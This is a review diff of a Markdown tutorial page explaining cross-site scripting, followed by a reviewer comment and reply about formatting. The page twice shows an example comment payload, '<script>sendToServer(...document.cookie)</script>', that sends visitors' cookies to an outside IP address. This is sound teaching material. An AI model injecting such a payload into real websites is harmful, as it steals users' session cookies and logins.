contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -9,64 +9,87 @@
-example, HTML also supports `<script>`, for you to write JavaScript code on the
-webpage as well.
+<modal title="**`<script>` and `</script>` in html**" id="modal:script">
+In HTML, anything between the opening and closing script tags will run as <b>JavaScript</b>. 
+</modal>
+
+What happens when a malicious user submits the following as a comment?
 
 ```html
 This is an innocent looking comment. <script>sendToServer("http://139.241.0.3/", document.cookie)</script>
 ```
 
-While visitors of the blog will only see the non-script portion of the
-comments (i.e. `This is an innocent looking comment.`), the browser will not
-show the script portion of the comment, because it is legal HTML (you won't see
-the tags like `<b>` and `<i>` when viewing webpages, so you definitely won't see
-`<script>` on the webpage).
+It becomes: 
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph! <br>
+I **like** your photograph! <br>
+This is an innocent looking comment.
+
+Visitors of the blog will only see the non-script portion of the comment. The script portion is rendered as `Javascript` just like how the `<b>` and `<i>` tags causes text to be **bolded** and *italicised* but the tags themselves are not shown. 
 
-However, the browser is **actually executing the script**, without the visitor even being aware of what's going on.
+The script `<script>sendToServer("http://139.241.0.3/", document.cookie)</script>` will be run immediately when the visitors load the website. Here, the visitor will be unaware that his <trigger for="modal:cookie">cookie</trigger> is stolen. 
 
-This means that any malicious users (i.e. hackers) can write a script on their comments, such that everyone that visits the website will have the script executed. The script can be malicious in nature (in our example, the script sends the cookie of the visitor to the hacker).
+<modal title="**What is a Cookie?**" id="modal:cookie">
+A cookie is a piece of data sent from the server and stored on the client's computer. It can contain sensitive information such as login data. You can read more about it <a href="https://en.wikipedia.org/wiki/HTTP_cookie" target="_blank">here</a>.
+</modal>
 
-Therefore, the hacker has managed to add additional malicious "functionality" to the website, that is not intended by the original website developer.
+Therefore, the malicious user has managed to add additional "functionalities" to the website that is not intended by the original website developer.
 
 > Trivia: The term "Cross Site Scripting" is actually an old term. It originally describe an attack whereby hackers write malicious JavaScript scripts on a separate website, and injects it into the victim's website, in order to steal data from the victim's website/deface the page (hence "Cross Site"). Such attacks are no longer possible today, and the modern definition of "Cross Site Scripting" includes attacks that do not need to be on a separate website to work.
```

Comment:
If this is a quote, give source. If it is not a quote, format it as a `<box>` rather than a blockquote

Reply:
Changed to a <box> instead